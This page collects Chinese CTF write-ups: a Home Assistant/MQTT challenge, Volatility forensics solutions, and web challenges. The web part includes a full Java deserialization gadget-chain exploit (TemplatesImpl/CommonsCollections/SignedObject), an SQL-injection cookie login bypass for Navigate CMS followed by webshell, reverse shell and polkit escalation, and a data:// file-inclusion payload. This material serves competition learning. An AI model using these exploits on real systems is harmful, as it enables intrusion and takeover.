【NepCTF2022】原来你也玩智能家居 彩蛋 WriteUP
前言
其实tips给到docker已经有点明显了,但大爹们可能是拿到flag就不想继续玩了(
具体步骤
要不要考虑去docker hub上看看Nepctf?
pull下来,启动容器/直接导出镜像后,查看home assistant配置文件,就可以看到信号数据,以及彩蛋填写的地址。
可是到比赛结束都没人找到彩蛋,现在表单已经关闭,礼物就只能留给yunoon自己啦~
后话
下一次要整点什么活呢~
Yunoon 发布的文章
【NepCTF2022】原来你也玩智能家居 WriteUP + 出题思路
by Yunoon
前言
题目的灵感是来自于Yunoon这边自己为了方便显示器信号的频繁切换,不想一直摁显示器的切换按钮而来。
正巧家里还有小爱音响pro、智能网关这类,就想着组个智能家居,顺便把这些设备全都接入到一个平台上,目前比较友好的就是home assistant了。
Home Assistant 是一款用于家庭自动化的免费开源软件,旨在成为智能家居设备的中央控制系统,专注于本地控制和隐私。可以使用 Android 和 iOS 配套应用程序通过基于 Web 的用户界面访问它,或者通过支持的虚拟助手(如 Google Assistant、Amazon Alexa 甚至斯坦福大学的“Genie”(以前称为“Almond”))通过语音命令访问它开放虚拟助理实验室 (OVAL.) ----翻译自维基百科
这样可以将这些设备都接入到苹果生态中啦(懒狗、deadline都是核心生产力)。
在搭建好后,就购买了可以控制红外收发的设备(ESP8266+收发模块),以及HDMI切换器(支持红外控制)。
通过将ESP8266刷入激活了红外模块的tasmota系统
TASMOTA是具有快速设置和更新的完全本地控制。
使用 MQTT、Web UI、HTTP 或串行进行控制。
使用计时器、规则或脚本实现自动化。
与家庭自动化解决方案集成。
令人难以置信的可扩展性和灵活性。
通过tasmota的控制台可以接收到HDMI红外遥控的NUC数据,将获取的数据存储下来。
在将tasmota添加至home assistant中,在home assistant的configuration.yaml中编写一个开关模块(将获取到的NUC数据放在请求接口中),该模块将调用mqtt的订阅,实现利用mqtt+tasmota控制HDMI控制器。
并且在home assistant中添加HomeKit就可以将红外开关放人HomeKit中了~
题目描述
Yunoon最近沉迷于homeassistant,但他忘记了显示器切换的红外信号数据了,你能帮帮他么。
tips:因为Yunoon比较懒,所有的配置都是默认的。
一个被docker环境难倒的废人呜呜呜
URL:http://222.187.239.143:10013
直播间URL:https://b23.tv/bn0pPAR
别扫别的端口了,求求惹。
不用爆破密码我直接给:admin/admin
共享环境,请不要更改密码。
考点
弱密码(X)/mqtt订阅通配符/homeassistant/tasmota
出题步骤
- 弱密码登录(已经省略啦
- 通过查看设备,发现tasmota设备位于局域网中,无法访问。
- 可以通过tips了解到,tasmota的mqtt监听默认主题
cmnd。 - 利用在mqtt主题中获取到的
cmnd加上通配符,即可监听所有的tasmota的mqtt数据。 - 再次点击切换,即可获取到data数据,即flag。
解题步骤
使用题目描述中的admin/admin进入
首页就可以发现有显示器切换的按钮。
但问题的点就是在如何获取到其中的信号(data数据),没有玩过home assistant的小伙伴可能就是一脸懵*,但这里就是一个考察大家如何通过已知的信息进行更多信息收集的能力,比如home assistant是什么,开启的服务。
进入后,发现开启了3个服务,分别为MQTT、Radio Browser、Tasmota
这里就可以考虑到题目描述中的默认配置,以及MQTT。
Tasmota的MQTT默认订阅为cmnd/stat/tele
这里就可以利用MQTT的通配符特性来捕获cmnd下所有的数据,即
cmnd/#在MQTT的配置页面进行监听,再开启一个页面进入首页,点击屏幕切换,即可获取显示器切换的data。
点击切换按钮
即可获取flag
解题步骤2.0
在原有基础上,可以下载MQTT服务的诊断文件,也可获得flag。
查看下载文件
后话
这个题目其实不算是漏洞考点(毕竟是Misc),主要就是在看看大家在遇到没有遇到过的环境时的临时应变以及信息收集的能力,塞入的真实环境也是节目效果,是要在拿到彩蛋后才能触发的真结局。
希望下一次的NepCTF能够给各位整点新活,我们下次再见!
关于彩蛋
再读下题目描述,和docker相关。
在这之前做出来都算哟。
后续会在平台关闭后再将彩蛋解题思路上线博客博客链接
2022 鹏城杯(Yunoon)
Misc
简单取证
浏览记录查看
vol.py -f file.raw --profile=WinXPSP2x86 iehistoryProcess: 1600 explorer.exe Cache type "URL " at 0x1fb5800 Record length: 0x100 Location: Visited: Administrator@http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome Last modified: 2022-06-20 12:36:39 UTC+0000 Last accessed: 2022-06-20 12:36:39 UTC+0000 File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc4 ************************************************** Process: 1600 explorer.exe Cache type "DEST" at 0x2ab9a55 Last modified: 2022-06-20 21:00:08 UTC+0000 Last accessed: 2022-06-20 13:00:10 UTC+0000 URL: Administrator@file:///C:/Documents%20and%20Settings/Administrator/Lhb/secret.jpg
获取到敏感文件secret.jpg
全局搜索secret.jpg
vol.py -f file.raw --profile=WinXPSP2x86 filescan | grep secret.jpgyunoon@YunoondeMacBook-Air Simple_forensics % vol.py -f file.raw --profile=WinXPSP2x86 filescan | grep secret.jpg Volatility Foundation Volatility Framework 2.6.1 0x000000000207e3d8 1 0 RW-rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\Recent\secret.jpg (3).lnk 0x0000000002325028 1 0 R--r-- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\secret.jpg提取secret.jpg
vol.py -f file.raw --profile=WinXPSP2x86 dumpfiles -Q 0x0000000002325028 --dump-dir=./查看发现为base64加密的逆序数据,将其解密,得到一个加密的zip包。
通过
strings file.raw | grep password获取到密码echo password = 62b041223bb9a解压后,发现是散点图。
gnuplot绘制即可
a
扫码获取flag:flag{a6b93e36-f097-11ec-a9b2-5254002d2b31}
what_is_log(是一血 好耶!)
strings flag2.scap
challenge
info
info
name
name
challenge
info
+---------+----------------------------------+
| name | data |
+---------+----------------------------------+
| success | 1555a651a13ec074ce725383214fd7cc |
+---------+----------------------------------+
1 row in set (0.00 sec)
/etc/localtime
mysql>
+---------+----------------------------------+
| name | data
/proc/loadavg
flag: PCL{1555a651a13ec074ce725383214fd7cc}7cc}
Web
Ez_Java
解压后,通过IDEA进行反编译。
先通过signedobject二次反序列化绕黑名单
再用/data接口打cb链
TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][]{ ClassPool.getDefault().get(calc.class.getName()).toBytecode() }); setFieldValue(obj, "_name", "HelloTemplatesImpl"); setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; ConstantFactory constantFactory = new ConstantFactory(TrAXFilter.class); Transformer[] transformers = new Transformer[]{ new ConstantTransformer(TrAXFilter.class), new InstantiateTransformer( new Class[] { Templates.class }, new Object[] { obj }) }; Transformer transformerChain = new ChainedTransformer(fakeTransformers); Map hashMap = new HashMap(); Map outerMap = DefaultedMap.decorate(hashMap, transformerChain); TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, "key"); HashMap evalMap = new HashMap(); evalMap.put(tiedMapEntry, "test"); outerMap.remove("key"); Field declaredFields = ChainedTransformer.class.getDeclaredField("iTransformers"); declaredFields.setAccessible(true); declaredFields.set(transformerChain, transformers); PrivateKey privateKey = new PrivateKey() { @Override public String getAlgorithm() { return null; } @Override public String getFormat() { return null; } @Override public byte[] getEncoded() { return new byte[0]; } }; Signature signature = new Signature("AES") { @Override protected void engineInitVerify(PublicKey publicKey) throws InvalidKeyException { } @Override protected void engineInitSign(PrivateKey privateKey) throws InvalidKeyException { } @Override protected void engineUpdate(byte b) throws SignatureException { } @Override protected void engineUpdate(byte[] b, int off, int len) throws SignatureException { } @Override protected byte[] engineSign() throws SignatureException { return new byte[0]; } @Override protected boolean engineVerify(byte[] sigBytes) throws SignatureException { return false; } @Override protected void engineSetParameter(String param, Object value) throws InvalidParameterException { } @Override protected Object engineGetParameter(String param) throws InvalidParameterException { return null; } }; SignedObject signedObject = new SignedObject(evalMap, privateKey, signature); final BeanComparator comparator = new BeanComparator(); final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator); queue.add(1); queue.add(1); setFieldValue(comparator, "property", "object"); setFieldValue(queue, "queue", new Object[]{signedObject, signedObject}); ByteArrayOutputStream barr = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(barr); oos.writeObject(queue); oos.close();
高手高手高高手
扫出路径login.php
发现是navigate cms的洞,题目提示有msf,那就直接用msf来试试,发现路径要改为“/”,但依旧上传不成功。
登录绕过
Cookie:navigate-user=\' OR TRUE--%20利用发现template处可以文件任意写入
就可以用蚁剑连上。
然后再反弹shell,使用同样的方法再上传个polkit提权。
发现有个flag文件,但提示需要删掉菠菜内容,二进制查看,发现文件位置。
去掉写保护后,可以成功删除,并且再次执行拿到flag。
Th3ee Ciscn 西南赛区分区赛 WriteUP
Web1 签到
源码里的Base64 解密一下
Web2 Code_1
- 用data://伪协议+base64来获取Welcome!
- 然后包含./flag.php即可
payload:?input1=./flag.php&&input2=data://text/plain;base64,V2VsY29tZSE=&&input3=test
Misc1
Misc3 EASYFORENSICS
解压出来的vmem文件,直接用volatility提取数据。
- 过滤flag关键字
yunoon@YunoondeMacBook-Air Misc3 % vol.py -f CTFWindows7-8f09ab24.vmem --profile=Win7SP1x86_23418 filescan | grep flag Volatility Foundation Volatility Framework 2.6.1 0x000000002e8c0880 8 0 RW-r-- \Device\HarddiskVolume2\flag\hint.txt.txt 0x000000002e8f7a58 1 1 R--rw- \Device\HarddiskVolume2\flag 0x000000002e90f038 8 0 RW-r-- \Device\HarddiskVolume2\fffffflag\baidunetdisk.txt 0x000000002e96ac80 2 0 RW-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Recent\fffffflag.lnk 0x000000002f38b038 1 1 R--rw- \Device\HarddiskVolume2\fffffflag 0x000000002f39f038 2 0 RW-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Recent\flag.lnk 0x000000002f3b10d8 2 1 R--rwd \Device\HarddiskVolume2\fffffflag 0x000000002f8a4298 2 1 R--rwd \Device\HarddiskVolume2\fffffflag
- 过滤xiaoming和txt关键字
yunoon@YunoondeMacBook-Air Misc3 % vol.py -f CTFWindows7-8f09ab24.vmem --profile=Win7SP1x86_23418 filescan | grep xiaoming | grep .txt Volatility Foundation Volatility Framework 2.6.1 0x000000002bf5f110 2 0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\xiaoming@ieonline.microsoft[1].txt 0x000000002e967e48 2 0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@hm.baidu[1].txt 0x000000002e973b40 2 0 RW-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Recent\zippasswd.txt.lnk 0x000000002e9fe628 8 0 RW---- \Device\HarddiskVolume2\Users\xiaoming\Desktop\zippasswd.txt 0x000000002ea9ad90 8 0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@cmd5[1].txt 0x000000002ebc2878 2 0 RW-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Recent\hint.txt.lnk 0x000000002f34f210 8 0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@bing[2].txt 0x000000002f398c98 1 1 -W-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Local\Temp\FXSAPIDebugLogFile.txt 0x000000002f7d1480 2 0 RW-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Recent\baidunewdisk.txt.lnk 0x000000002f82bb78 8 0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@msn[2].txt 0x000000002f8c9cb8 8 0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@sojson[1].txt 0x000000002f9c0038 8 0 -W-rw- \Device\HarddiskVolume2\Users\xiaoming\AppData\Local\Microsoft\Internet Explorer\brndlog.txt 0x000000002f9cfaf8 2 0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@cn.bing[2].txt 0x000000002f9f0af0 2 0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\Low\xiaoming@www.bing[1].txt 0x000000002fb0d500 8 0 -W-rwd \Device\HarddiskVolume2\Users\xiaoming\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\5G8FOASY\eb-c31c9a-3cb8f63e[1].txt 0x000000002fb1a588 8 0 -W---- \Device\HarddiskVolume2\Users\xiaoming\AppData\Roaming\Microsoft\Windows\Cookies\xiaoming@microsoft[1].txt - 提取数据
yunoon@YunoondeMacBook-Air Misc3 % vol.py -f CTFWindows7-8f09ab24.vmem --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000002e8c0880 --dump-dir=./ Volatility Foundation Volatility Framework 2.6.1 DataSectionObject 0x2e8c0880 None \Device\HarddiskVolume2\flag\hint.txt.txt yunoon@YunoondeMacBook-Air Misc3 % vol.py -f CTFWindows7-8f09ab24.vmem --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000002e90f038 --dump-dir=./ Volatility Foundation Volatility Framework 2.6.1 DataSectionObject 0x2e90f038 None \Device\HarddiskVolume2\fffffflag\baidunetdisk.txt yunoon@YunoondeMacBook-Air Misc3 % vol.py -f CTFWindows7-8f09ab24.vmem --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000002e9fe628 --dump-dir=./提取出来的文件有
hint.txt.txt,baidunetdisk.txt,zippasswd.txt
通过获取到剪贴板的数据
fa5ef7676006afd4748becb7e68b0aed,可以提取到网盘提取码。yunoon@YunoondeMacBook-Air Misc3 % vol.py -f CTFWindows7-8f09ab24.vmem --profile=Win7SP1x86_23418 clipboard Volatility Foundation Volatility Framework 2.6.1 Session WindowStation Format Handle Object Data ---------- ------------- ------------------ ---------- ---------- -------------------------------------------------- 1 WinSta0 0xc009L 0x124034b 0xff5820a8 1 WinSta0 CF_TEXT 0x0 ---------- 1 WinSta0 CF_UNICODETEXT 0xe0395 0xffb83ee0 fa5ef7676006afd4748becb7e68b0aed 1 WinSta0 0xc013L 0x3101cf 0xff5744f8 1 WinSta0 CF_LOCALE 0x49008b 0xfda0d260 1 WinSta0 CF_OEMTEXT 0x1 ----------md5解密后,得到为789C
下载获得flag.img文件
将其挂载后得到以下数据
YESYESLookAtme就是我们要找的文件,利用提取到的zippasswd.txt获得其中内容。
zippasswd是hex字符串,可以直接放到16进制编辑器中,发现是PNG文件。
但头文件有问题,对其进行修复,更改文件后缀为png。
获取到qrcode
扫码获取解压码
password_is_passwd解压得到其中的内容,一共有377个
这里拿到过后开始以为是三维图,画了半天感觉方向错了,是RGB数据。
编写脚本,把每个文件渲染成图片。
from PIL import Image #图片有1600条RGB数据,因此判断为40x40. def render(name): file1 = open(name) im = Image.new("RGB", (40, 40)) for i in range(40): for j in range(40): file = file1.readline() list1 = file.split(" ") im.putpixel((i, j), (int(list1[0]), int(list1[1]), int(list1[2]))) im.save(f"./pic/{name}.png") def main(): # render("1.txt") print(f"=========Is Render Img{i}=============") render(f"{i}.txt") if __name__ == '__main__': main()获取到图片过后,使用magick+gaps来拼接图片。
377个图片可以推算出只有两种排列方式
for i in range(376): for j in range(377): if i*j == 377: print(i,j) #output: #13 29 #29 13magick安装
- 直接参考官网即可下载/安装连接
- macOS的
gaps安装
- 直接参考GitHub安装文档 项目GitHub连接
- 直接查看installation
- 可以改requirements.txt,也可以不改,报错改就行。
使用magick来讲分散的图片进行拼接
montage *.txt.png -tile 29x13 -geometry +0+0 flag.png
-tile: 指定长x宽
-geometry geometry preferred tile and border sizes就可以将所有的.txt.png图片拼接成一个29x13的图片
在使用gaps来进行自动拼图就行,安装完毕后,在bin/目录下执行命令即可。
python3 gaps --image=flag.png --size=40--image: 指定图片
--size: 指定每一块的图像的大小。最终的结果
所以说为什么Misc1的伪flag,是这里的真flag,胖揍出题人。这里的真flag,胖揍出题人。是这里的真flag,胖揍出题人。
在kali 中安装pd tools遇到的问题
前言
《关于我PD被自己搞坏了重装这件事》
环境:
macOS 11.6
PD 17.1
kali 2022
正文
点击安装pd tools
把挂载盘中的数据拷贝出来
给该目录对应的权限
chmod 777 -R ./cdrom0安装dkms
apt install dkms查看内核版本
uname -r下载对应版本3个内核文件下载链接
headers-common
headers-amd64(下载对应的)
kbuild
1.因为无法复制,只能手敲url,用wget <url>即刻。
安装即可
- dpkg -i <你下载的kbuild>
- dpkg -i <你下载的headers-common>
- dpkg -i <你下载的headers-对应内核>
然后进入复制目录的位置
./install即可